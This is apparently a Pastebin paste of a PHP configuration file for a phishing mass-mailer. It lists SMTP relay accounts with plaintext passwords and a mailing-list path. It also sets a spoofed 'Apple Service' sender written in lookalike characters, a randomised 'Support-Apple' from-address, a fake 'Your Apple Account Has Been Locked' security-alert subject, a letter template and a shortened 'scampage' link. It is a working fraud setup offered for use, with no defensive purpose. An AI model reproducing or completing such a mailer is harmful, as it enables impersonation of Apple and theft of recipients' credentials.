Advertisement
d1m4s

Untitled

Jan 24th, 2018
134
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. <?php
  2.  
  3. //Regards
  4. date_default_timezone_set('Asia/Jakarta');
  5. $date = date('F d, Y, h:i A T');
  6.  
  7. /* SMTP SETUP */
  8. $smtp_acc = [
  9. [
  10. "host" => "smtp-relay.gmail.com",
  11. "port" => "587",
  12. "username" => "semutgajah02@fitry-ngambek.com",
  13. "password" => "a1s1d2f2"
  14. ],
  15. [
  16. "host" => "smtp-relay.gmail.com",
  17. "port" => "587",
  18. "username" => "semutgajah02@fitry-ngambek.com",
  19. "password" => "a1s1d2f2"
  20. ],
  21. /*[
  22. "host" => "smtp-relay.gmail.com",
  23. "port" => "587",
  24. "username" => "semutgajah02@fitry-ngambek.com",
  25. "password" => "a1s1d2f2"
  26. ],*/
  27.  
  28. ];
  29.  
  30. /* Features SETUP */
  31.  
  32. $gx_setup = [
  33. "priority" => 1,
  34. "userandom" => 0,
  35. "sleeptime" => 2,
  36. "replacement" => 1,
  37. "filesend" => 1,
  38. "userremoveline" => 0,
  39. "mail_list" => "file/maillist/hot.txt",
  40. "fromname" => "ฮ‘ั€ั€lะต Service",
  41. "frommail" => "Support-Apple" . RandString1(10) . "@" . RandString1(8) . "Unlockaccount.live.mail.fitry-ngambek.com",
  42. "subject" => "[Security-alert] Your Apple Account Has Been Locked For Security Reason.",
  43. "msgfile" => "file/letter/1.html",
  44. "filepdf" => "file/attachment/logo.ico",
  45. "scampage" => ["ow.ly"],
  46. ];
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement